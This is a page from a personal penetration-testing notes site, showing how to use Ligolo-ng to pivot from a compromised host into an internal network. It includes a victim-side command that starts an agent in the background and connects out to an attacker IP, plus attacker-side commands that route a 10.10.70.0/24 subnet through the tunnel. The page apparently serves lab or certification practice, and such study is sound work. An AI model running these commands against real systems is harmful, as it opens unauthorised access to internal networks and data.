yuyudhn's notes
  • About
  • 🚉QUICKSTART
    • Prerequisite
    • Reconnaissance
    • Exploitation
    • Post Exploitation
    • ⛈️Misc
  • 🪟Active Directory
    • Basic Command
    • Enumeration
      • PowerView
    • Service Exploitation
      • LDAP
      • SMB
        • MS17-010
      • MSSQL
    • Privilege Escalation
      • Unquoted Service Path
      • UAC Bypass
      • Token Abuse
    • Post Exploitation
      • Tunneling with Ligolo-ng
    • Credential Hunting
      • Group Policy Preferences
      • DPAPI
  • MITRE ATT&CK
    • Defense Evasion
      • Physical Attack: Remove EDR
      • AMSI Bypass
    • Credential Access
      • Dump SAM Hashes via Registry
  • 🐧Linux
    • Misc
    • Linux Post Exploitation
    • Linux Password Hunting
  • 🐚Backdoor Stuff
    • Simple PHP Webshell
    • MSFvenom Generate Payload
  • 📳Mobile Pentest: iOS
    • iOS Penetration Testing
    • Objection
  • 🕸️Web Application
    • Common Applications
      • Tomcat
      • Joomla
    • SSTI
    • File Inclusion
    • XSS
    • Misc
  • 🖊️Machine Writeup
    • HackTheBox
      • Perfection
      • Pilgrimage
      • PC
      • Shoppy
      • GoodGames
      • Photobomb
      • Support
Powered by GitBook
On this page
  • From Attacker Side - Start Server
  • From Victim Side - Connect to Server
  • From Attacker Side - Start Tunneling

Was this helpful?

  1. Active Directory
  2. Post Exploitation

Tunneling with Ligolo-ng

Tunneling with Ligolo-ng

PreviousPost ExploitationNextCredential Hunting

Last updated 6 months ago

Was this helpful?

Ligolo-ng is a tool used for tunneling network traffic, primarily in penetration testing and security assessments. Its main purpose is to create a secure tunnel between a compromised machine and an attacker's server, allowing the attacker to access internal networks or services that are not directly reachable from the outside. This is especially useful for bypassing firewalls and for exfiltrating data or gaining further access within a target network. Ligolo-ng can support various protocols, making it versatile for different scenarios.

From Attacker Side - Start Server

sudo ligolo-proxy -selfcert
interface_create --name "oscp-chall"

From Victim Side - Connect to Server

start /B ligolo-agent.exe -ignore-cert -connect 192.168.45.188:11601

From Attacker Side - Start Tunneling

Then, from attacker side, after agent joined, run:

session
tunnel_start --tun "oscp-chall"
ifconfig
interface_add_route --name oscp-chall --route 10.10.70.0/24
Ligolo Proxy

Now, our machine will able to access internal targets.

Add new route
Internal Access
🪟